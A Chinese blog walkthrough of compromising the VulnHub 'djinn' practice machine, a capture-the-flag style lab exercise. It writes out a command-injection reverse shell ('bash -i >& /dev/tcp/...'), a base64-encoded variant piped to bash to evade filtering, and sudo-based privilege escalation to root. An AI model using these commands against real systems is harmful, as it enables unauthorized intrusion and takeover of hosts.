djinn vulnhub 靶机渗透过程

已于 2022-01-20 14:37:08 修改
阅读量1.9k 收藏
点赞数
分类专栏: 靶机渗透 文章标签: 安全 web安全 linux 渗透测试
于 2022-01-19 16:00:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrwangtw/article/details/122581049
版权

无聊,下个靶机来玩一下。

靶机下载地址:vulnhub官网

下载下来之后,我这边用的是virtualbox,kali攻击机与靶机都设置为net网络。

第一步,靶机扫描,这里打开靶机就能看到 ,靶机地址为10.0.2.43,这一步探测靶机地址可以不做,这里我的kali地址为10.0.2.4

第二步,靶机端口扫描

直接nmap扫描,具体命令就是nmap -sS -p 1-65535 10.0.2.43

第三步,信息的搜集。先进入ftp查看有什么文件线索,这里用anonymous(匿名)方式登录,可以看到三个文件

三个文件都下载下来查看一下

第一个文件感觉没什么用,ssh没有打开,无法验证第一个账户正确性,第二个文件提示我们,在1337号端口有个小游戏,这里直接进入1337端口,发现无法打开,这种情况我还是第一次遇见,之间发现打不开的情况都是要绑定ip与域名,查看大佬的博客发现,1337端口不能用浏览器直接访问,可以用kali的nc命令访问

 

 打开发现需要回答1000次数学计算问题,其实这里我在想能否写个脚本实现自动回答问题,但是本人的python语言掌握有限,写不出来。

所以接着访问另外一个7331端口

这里查看源代码没什么信息,考虑用gobuster扫描网站目录

 

 这里扫描目录时间挺长的,但是有用的也就wish目录,进入wish

 直接输入id,查看返回的内容

 

 这里直接bash reverse shell,bash -i >& /dev/tcp/10.0.2.4/4446 0>&1,后台监听,发现没有返回的shell,考虑可能是这条命令被禁止了。做到这就没什么思路了,看了大佬的博客,发现可以base64加密反弹shell,然后执行,加密后为echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuNC80NDQ2IDA+JjE= | base64 -d | bash,这里直接后台监听即可得到shell

 在当前的目录下发现信息

 直接到home的nitish目录里查看文件

这里直接su切换用户,发现出现了问题

搜了下发现是因为没有tty shell环境

输入这个生成ttyshell,python3 -c "import pty;pty.spawn('/bin/bash')"

然后切换用户即可,切换之后得到第一个flag

 sudo -l查看权限

 直接执行这个genie,发现

 

 这里看大佬的操作输入man genie之后会出现cmd的参数介绍,但是我输入之后发现没有返回这个参数,只能直接用这个参数了,直接sudo -u sam genie -cmd id,就可以打开sam的终端

搜集下信息,

 这里有个pyc的编译后的文件,在靶机上用python开启http服务,然后下载到本地,网上搜索反编译网站,我这里用的是这个,反编译如下

可以看到s==num哪里存在漏洞,这要在次输入sum即可。

sudo -l查看sam的权限

 直接执行,sudo /root/lago

这个程序正好对应上面的反编译出的文件,直接输入2,然后再输入num即可提权到root

 这里直接执行root目录下的文件,即可得到flag

 到这里就完成了

mrwangtw
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机之dawn
timesleep的博客
12-05 903
首先确定我们的IP 我们的靶机IP为192.168.34.160 kali的IP为192.168.34.175 那我们首先扫描端口 1234这个端口是我们之前做的时候留下的 我们看到了有80这个端口我们访问一下 好我们扫一下目录 我们访问一下 我们发现了日志文件我们看一下 然后我们继续看靶机的其它端口如,139,445有没有可利用的 我们看到还有一个ITDEPT的共享目录我们去看一下发...
Vulnhub-Djinn靶机-Writeup
Vicl1fe的博客
12-03 1239
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/djinn-1,397/ 靶机知识点: arp-scan nmap ftp nc dirsearch 命令执行 python2 input漏洞 主机发现 靶机是ova格式的,可以用Vmware导入,也可以用virtualbox打开。 使用...
VulnHub-Durian靶机详细渗透过程
MRS_jianai的博客
01-01 719
VulnHub-Durian靶机详细渗透过程
vulnhub靶机djinn:1渗透笔记
weixin_52268949的博客
02-16 2041
djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali ip地址 当打开这台靶机的时候我们就知道ip地址 由于我们已经确定了靶机的ip所以我们直接扫描开放端口 nmap -A -p- 192.168.20.145 首先我们去访问一下21端口的ftp服务,发现可以匿名登录。根目录有三个txt文本文件我们依次打开查看 creds.txt nitu:81299
Vulnhub靶机DJINN_ 1
LainWith的博客
02-03 1566
目录介绍信息收集主机发现主机信息探测测试1337端口测试21端口(ftp)测试7331端口(web)尝试目录扫描命令执行-反弹shell获取第一个Flag提权获取第二个Flag总结参考 介绍 系列:djinn(此系列共3台) 发布日期:2019 年 11 月 18 日 难度:初级-中级 Flag : 2个,普通用户的user.txt和root用户的root.txt 学习: gobuster 目录扫描 ftp 匿名登录 bypass 命令执行漏洞 反弹 shell 的使用 靶机地址:https://www
vulnhub靶机-djinn
臭nana的博客
06-27 946
1、找到靶机ip:192.168.0.108
靶机系列测试 djinn1
08-03
靶机系列测试 djinn1】是一篇关于虚拟机安全测试的教程,主要针对初到中级水平的用户。这个靶机兼容VirtualBox和VMWare,可以通过DHCP自动分配IP地址,用户可以在登录界面直接看到IP。挑战的目标是找到并读取两个...
djinn:Djinn分割键盘
04-11
Djinn分割键盘 Djinn是64键分割键盘-双4x7和4键拇指群集。 拇指下方还有一个5向触觉开关。 在奢侈方面,它具有音频,编码器支持,每键RGB和RGB余辉...以及240x320 LCD。 为了安全起见,它在USB连接器和分离式传输...
开源项目-thrisp-djinn.zip
09-05
开源项目-thrisp-djinn.zip,Djinn 1.0: html templating built on standard library html/template
PyPI 官网下载 | djinn_forms-1.2.2.tar.gz
01-31
标题中的"PyPI 官网下载 | djinn_forms-1.2.2.tar.gz"指出这是一个在Python Package Index(PyPI)上发布的软件包,名为`djinn_forms`,版本为1.2.2,其分发形式是tar.gz压缩文件。PyPI是Python开发者发布自己软件包...
Python库 | djinn_core-1.2.4.tar.gz
05-14
资源分类:Python库 所属语言:Python 资源全名:djinn_core-1.2.4.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
[SEERC2018] + [DZY loves fibonacci numbers]
wxx_louisa
03-18 239
我要哭了....写完的blog突然被快于脑速的手速删了...没了...!!!....那我贴个代码就跑了算了...sigh... A题 B题 C题 (抄了heltion的板子过的...实践出真知hhh) #include<cstdio> #include<iostream> #include<cstdlib> #include<algorithm&...
vulnhub靶机-djinn3
臭nana的博客
07-01 1665
1、靶机ip:192.168.0.110(开机就提示:不是所有的都需要扫描发现主机) 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.0.110 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.110 Host is up (0.0011s latency). Not shown: 65531 closed ports PORT STATE SERVICE V
dawn靶机打靶过程及思路
qq_52610024的博客
07-21 1256
5.执行mysql命令,sudo-uroot-p,输入之前命令历史内的hash破解之后的值,成功进入。6.利用find发现zsh具有root权限,输入zsh,zsh也具有root权限,成功得到root权限。3.针对3306端口的服务嗅探失败,针对80端口的目录发起扫描,发现日志里面存在一个。周期性的程序,创建一个相同名称的shell脚本,写入反弹shell的指令。4.成功突破边界进入系统,开始进行提权,首先查看命令历史,发现。符号中间没有信息,说明没有加盐,提示sudo-l命令。...
靶机测试djinn笔记
qq_56426046的博客
01-13 432
函数将传入来的字符串进行条件判断,如果满足以下条件等于 true 返回并且不会这些下面语句。翻译 哦,我忘了告诉你我在 1337 号港口为你准备了一个游戏。发现可以不需要密码执行 root 用户下的/root/lago 文件。这是 python flask 框架的 app.py 文件。帮助文档告诉我们可以执行 shell 经过测试均不能执行。通过这份源码 可以判断与 root/lago 文件一样。当 s 等于 num 会这些执行/bin/sh。
vulnhub靶机djinn2
最新发布
waitagirl的博客
03-22 1920
vulnhub靶机djinn2
djinn2 vulnhub 渗透靶机过程
mrwangtw的博客
01-20 2771
这次的靶机感觉挺难的,过程中看了大佬的博客,跟着做了很多次,才完成了提权到root。 靶机扫描 这次的djinn2和djinn1是一样的,打开就可以看到IP地址,我的靶机地址为10.0.2.44,攻击机10.0.2.4. 端口扫描 跟djinn1一样用匿名的方式登录ftp 把三个文件下载下来查看 有用的信息也就第一个,另外的文件没什么可用的信息。 从上面的端口扫描结果发现,开放了ssh,尝试用第一个文件登录发现不可行。 进入 1337端口,结果同djinn1一样,不能用浏览器打开
VulnHub系列』HA: ISRO-Walkthrough
ins1ght的博客
10-23 914
靶机发布日期:2019年10月4日,这是一个CTF类型的靶机,共有4个flag。查看网页源代码得到提示,下载到一个TrueCrypt类型的文件,使用脚本以及john得到密码,最过VeraCrypt打开文件,得到flag;gobuster发现connect.php页面,随后通过该页面反弹shell,进入靶机后发现/etc/passwd可写,成功提权。
靶机练习 No.22 Vulnhub靶机 Breakout samba,webmin,tar提权
YouthBelief的博客
01-24 3825
0x00 环境准备 靶机下载 https://www.vulnhub.com/entry/empire-breakout,751/ 启动方式 VMware 启动 版本信息 Name: Empire: Breakout Date release: 21 Oct 2021 Author: icex64 & Empire Cybersecurity Series: Empire 靶机描述 Difficulty: Easy This box was created to be an E
DJinn1靶机教程:初阶到中阶的网络安全挑战
Djinn1靶机的下载地址可在VulnHub网站上找到,操作系统为Linux。在进行靶机测试时,首先需要进行信息收集,这通常包括端口扫描。 **信息收集** 信息收集的第一步是使用nmap工具进行全面扫描,例如执行`nmap -p --A ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值